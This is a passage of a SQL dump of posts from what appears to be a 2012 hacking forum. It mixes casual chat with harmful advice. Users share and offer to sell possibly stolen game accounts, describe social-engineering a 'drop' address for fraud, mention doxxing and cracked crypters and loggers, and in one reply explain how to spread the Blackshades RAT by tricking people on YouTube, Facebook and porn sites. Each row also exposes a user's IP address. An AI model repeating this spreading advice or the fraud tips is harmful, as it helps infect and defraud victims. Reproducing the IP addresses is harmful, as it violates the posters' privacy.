Netflix account but won\'t buy it for $1.25 :p So I\'ll be nice and give him this link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '763145fec0876146338a61ba476f26ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6781', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351715454', 'Why would we post some accounts we found here when we can make a new thread each time? :p It will increase the forum\'s activity to be honest.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '061e62290cf39464d0335c9bcbacb6fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6782', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351715557', 'Nice share. But I don\'t need any accounts right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a472980a0680509c484b11005c358371', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6783', '1143', '6705', '24', 'RE: NEED HELP', '0', '82', 'iTzIpod', '1351715729', 'It\'s probably Hurricane Sandy, if not, try contacting your ISP. Unless, someone is hitting you offline. I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96bddec3b842ac63c765c0e24d385ef7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6784', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '82', 'iTzIpod', '1351715790', 'It\'s alright. I like the font! :p Could add more work to it though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68be668710c04ea5057fcd7207a4a2b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6785', '1155', '6738', '3', 'RE: Happy Halloween', '0', '82', 'iTzIpod', '1351715840', 'Happy Halloween everyone! :) Enjoy your holiday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f16d466596669c8f924df1cc0adb27ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6786', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351715895', 'Lool HoverCatz! 6/10. I don\'t like it :p Sowwie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '023f19f0636ba3d47661511d7d5336dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6787', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351715938', 'I would like to join and help build the server.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f92ec68001c799eb46ca4db074b728ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6788', '1155', '6738', '3', 'RE: Happy Halloween', '0', '2', 'Apathy', '1351722026', 'Happy Halloween. Don\'t get too scared. xD', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'c4f1ab907d4fc5abe603feecfcdb1e2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6789', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '2', 'Apathy', '1351722443', 'Thanks for the warning/heads up. :)', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '542c13632cdef8cdb62d4d6fa5c078a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6790', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351724213', 'Same i would love to OP on it so yeah', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c4fd23e5fcee07a97f3d03997c29f7ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6791', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351724473', 'Will hurricane sandy affect me if i am in Australia and sorry but hamachi does not work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'fccf51ebcd5122432f34a76e8b7cf27d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6792', '1159', '6782', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351724535', '[quote=\'iTzIpod\' pid=\'6782\' dateline=\'1351715557\'] Nice share. But I don\'t need any accounts right now. [/quote] Ok maybe you can sell the ones that work :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '877568e8d5bf541cc5d853ad33661ffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6793', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351724603', 'Yeah true i didn\'t bother to read the thread the thread when i wrote them so yeah sorry', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'be7b67dea0086d118a3184ed66adb661', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6794', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '257', 'XxTREYZxX', '1351725473', 'Whoever buys her would want to keep her for long,make the most of her :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'afdcf19cbb664c7096154595a4993abc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6795', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '257', 'XxTREYZxX', '1351725637', 'Yeah different people have different immune systems and can handle it', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7df414f06f99a2d649b28a78d828aa0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6796', '1143', '6705', '24', 'RE: NEED HELP', '0', '82', 'iTzIpod', '1351726800', 'No it will not affect you. Um. Yeah. Contact your ISP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3115d81928e584a81a540a3cb022c091', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6797', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351726834', 'But it\'s here for free. ._.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c43ecd6b12475410d03b796794acb52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6798', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351726864', 'Can you fix your grammar please?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cf09aeea429ac9da9f6ede8fb8a79bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6799', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '61', 'NXK', '1351727773', 'I should probably stop drinking them ahah, I drink way to many.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '03ebb3c9df5868722e8073b288e77d80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6800', '1099', '6533', '16', 'RE: Box Method and Drop Explained', '0', '61', 'NXK', '1351728048', '[quote=\'MinecraftGeek\' pid=\'6533\' dateline=\'1351421350\'] I guess this could work but it\'s risky. [/quote] Not if you have a good drop, It\'s really easy to S.E a drop. Mines at A abandoned house and all I do is say i own the property and it\'s for my mom and it\'s her birthday so I don\'t want her to find it. Drops are a really good to have :)', '99.252.235.12', '1677519628', '1', '0', '61', '1351728069', '1', 'efb193900066ecc2c20269580599040e', '0', '1351728069'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6801', '1144', '6706', '11', 'RE: What can you do with?', '0', '67', 'HoverCatz', '1351728236', 'You can dox people with it', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '86194b9b472e269a53893f0a425edadc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6802', '1143', '6705', '24', 'RE: NEED HELP', '0', '67', 'HoverCatz', '1351728324', 'What do you mean with it didnt work?', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'c9aca3d18b77acd8da8322101c11d408', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6803', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351734327', 'Turning off hamachi didnt solve the problem so yeah', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '70d1c216eaf6628b4bcc8e82db2fd201', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6804', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351734416', 'No like privately sell them to strangers :O', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2e6f9fd8669cf77fc98a66aa9190bed9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6805', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351734546', 'Sorry but what grammar did i miss :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b66c13fb6b07c8d2414094ad551b5023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6806', '1155', '6740', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351735700', '[quote=\'XxTREYZxX\' pid=\'6740\' dateline=\'1351662309\'] Thanks you joker and happy holloween to you to ,are you doing anything. [/quote] I had a couple of plans but got ruined by hurricane sandy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c5b24f3a0eb23d4546f3144da35127a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6807', '1142', '6776', '24', 'RE: Fuck you Internet Explorer', '0', '1', 't3h jok3r', '1351735798', '[quote=\'iTzIpod\' pid=\'6776\' dateline=\'1351715123\'] I use Google Chrome instead. It loads fast and looks simple and easy to use. [/quote] Same with me plus it reads every code properly and presents everything the way it should be unlike IE it shows messed up shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6cebcd27e19ec2a412fd6ac4e112257d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6808', '1148', '6775', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '1', 't3h jok3r', '1351735847', '[quote=\'VirtualLegend\' pid=\'6775\' dateline=\'1351710493\'] What for program is it? Can you put more info about it [/quote] I think it\'s kinda self-explanatory and the preview pic explains what it is.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '177ccda56e0600347c1f4f92b83bd753', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6809', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351735944', 'OH yeah are you travelling alright', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a6a8927df1a1ef6b0ff81e099b3b4808', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6810', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1351736396', 'I watched this shit and ENJOYED IT :D Thanks and you should earn from this shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6f42de774fb6011533f57caf43629250', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6811', '1164', '0', '11', 'RAT Help', '0', '160', 'Jacob', '1351737883', 'Well, I dont really know how to use Black Shades RAT. Could someone please tell me how, you would set it up, and spread it etc. I am pretty new when it comes to RATing, so I dont know really how I am supposed to set it up etc. Jacob', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '9f06067c91294a6a50bad592c6cdf860', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6812', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '61', 'NXK', '1351738179', 'Not going to lie I have watched this before and I found it funny enjoy mates.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'd84c199fd8e1ce8bf666e7c941e43fb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6813', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '61', 'NXK', '1351738386', 'This looks nice I might need to use this soon. Thanks for this.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '3b6467d536dabd4cc6d7bc74d4d7cea9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6814', '1143', '6705', '24', 'RE: NEED HELP', '0', '1', 't3h jok3r', '1351740393', 'As p420 said, disable your anti virus firewall.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a3628b0bbd4ec4df44ca5d17051e6d3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6815', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '1', 't3h jok3r', '1351740487', 'I got a new PC today and it came with windows 8. It looks great but still learning how to use this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6b8a33d0dfacdac57b8c2c02d8e65f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6816', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '1', 't3h jok3r', '1351740683', 'Set this as my desktop again. Bumping this so others can see this too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '06e6b030a2dc0fe7dee2391c36082903', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6817', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '1', 't3h jok3r', '1351740838', 'The picture is broken for me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd15c1e0c5734f54462de435e200a0659', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6818', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '257', 'XxTREYZxX', '1351743807', 'Same with me the pic is broken please fix', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '6f12fbf572848c448da6c74dc6f22f9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6819', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351743912', 'done that,still doesn\'t work any other suggestions', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'de1b0e68b28a785c979c209a92109f74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6820', '1165', '0', '7', 'I m Back on LH:)', '0', '54', 'Sin Cara', '1351744218', 'So i after a long time i m back to LH :)', '119.154.20.81', '2006586449', '1', '0', '0', '0', '1', 'c7f20a2988460f65a70cc50e02bfaf64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6821', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '228', 'VirtualLegend', '1351744392', 'Welcome Back, Hope you will stay active now :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '54479cd1143990fb9d8e1997e9fadf89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6822', '1163', '6817', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '228', 'VirtualLegend', '1351744631', '[quote=\'t3h jok3r\' pid=\'6817\' dateline=\'1351740838\'] The picture is broken for me. [/quote] Thats Strange, gonna fix it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0c191d4554760f30433b5bfcd0ebebc4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6823', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '1', 't3h jok3r', '1351747521', 'Already knew about this because I made a proxy with this once. Thanks for sharing, it\'s useful and I believe 98% of proxies out on the internet are glype proxy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26bb7e90d18e7f862206ca19ed1661a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6824', '1166', '0', '46', '[Guide] Reporting Phishing Pages', '0', '1', 't3h jok3r', '1351748936', '[b]What is Phishing?[/b] Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. [b]How to recognize a phishing page?[/b] Check the URL of the page. For example if the real URL is l33thacking.net then the phished URL would be l33thacking.c0m or l33thacknig.net. The concept is to make the URL look identical to fool their victim. [b]What if I typed in my username and/or password?[/b] If you just typed it in then you are safe but if you clicked enter, login, send etc then you have been successfully hacked so change your password as soon as possible. [b]How to report such messages?[/b] Here are a couple useful links to report phishing links. Recommended: http://www.antiphishing.org/report_phishing.html [u]Others[/u] [list] [*] https://www.google.com/safebrowsing/report_phish/ [*] Forward phishing emails to spam@uce.gov [*] Contact the company being phished and in this case is l33thacking.net so use our contact form ;) [/list]', '72.231.24.165', '1223104677', '1', '0', '1', '1351917747', '1', '59ebfa8c25836e05696815842abdb0ab', '0', '1351917747'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6825', '1164', '6811', '11', 'RE: RAT Help', '0', '5', 'Timmy', '1351749079', 'I can help you set it up send me a PM. When it comes to spreading you can spread it on youtube, facebook, pastebin, porn sites, trick people into downloading the server etc. You also need to portfward it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2bf3e1ddcf02eb76b17437a78e14abeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6826', '1167', '0', '75', 'Batman Arkham City Cheats', '0', '5', 'Timmy', '1351749505', '[b]All skins[/b] At the main menu, press Left(2), Down(2), Left(2), Right, Up(2), Down to unlock an option to select any of the bonus skins. If you entered the code correctly, you will hear a sound when you continue your game. -From: Kevin Yanko Big head mode Pull out the Cryptographic Sequencer, then hold LB + RB and rotate the Right Analog-stick clockwise ten times to make Batman\'s head and all enemy head\'s larger. Repeat the code to disable its effect. [b]New Game Plus mode[/b] Successfully complete the game on the Normal or Hard difficulty to unlock New Game Plus mode. This mode allows you to keep your previously earned gadgets and experience points. Additionally, there will not be any counter icons on thugs, thugs and Bosses will be more difficult, and thugs will have different configurations. [b]Taunting[/b] Rotate the Right Analog-stick clockwise repeatedly to perform a taunt. Note: If you execute a taunt before performing a glide kick with Batman or Robin, the view will change to the enemy\'s perspective. [b]Alternate ending[/b] [b]Note:[/b] The alternate ending requires the bonus \"Catwoman\" downloadable content. In Catwoman\'s third mission, when you have the option to go left or right with the \"loot\", go right to view the alternate ending. You will still be able to go backwards and not ruin anything in the main campaign. [b]Hidden messages[/b] Use Batman\'s Cryptographic Sequencer to go to the following coordinates to intercept secret radio broadcasts that read numbers, make a buzzing sound, and then repeat the numbers again. When the numbers are matched to the corresponding letters of the alphabet, they spell out a hidden message. [b]Note:[/b] Some of the secret broadcasts may not be available until after completing the main campaign. [u]Hidden message 1[/u] [i]Location: X: 700.00, Y: 500.00 Message: 9-23-9-12-12-18-5-20-21-18-14-2-1-20-13-1-14 Decoded message: \"I WILL RETURN BATMAN\"[/i] [u]Hidden message 2[/u] [i]Location: X: 500.00, Y: 900.00 Message: 5-15-9-7-21-18-18-14-3-5-24-15-12-7-22-3-10-5-15-9-22-3-8-25-26-15-16-25-10-15-17-25 Decoded message: \"YOU WILL PAY FOR WHAT YOU HAVE DONE TO ME\"[/i] [u]Hidden message 3[/u] [i]Location: X: 200.00, Y: 500.00 Message: 3-20-26-18-26-16-24-1-11-4-24-9-3-8-5-2-12-18-6-16-7-11-3-10-17-5-13-4-21-8 Decoded message: \"FEAR WILL TEAR GOTHAM CITY TO SHREDS\"[/i] [b]Easy Augmented Reality Challenge[/b] One of the last four Augmented Reality Challenges appears to be difficult because you are supposed to execute a U-turn during your dive bomb. This can be done more easily by using the grapple boost going past the first checkpoint, then turning around while gliding. You can then glide through all the checkpoints much easier. [b]Easy high scores with Batman in Combat Challenges[/b] Alternate throwing the Batarang and evading or jumping over the heads of enemies until you get to do a special move (combo 5x or 8x). You can do this five times before it will not add to your multiplier. If it gets blocked, it should not break your combo. It seems throwing 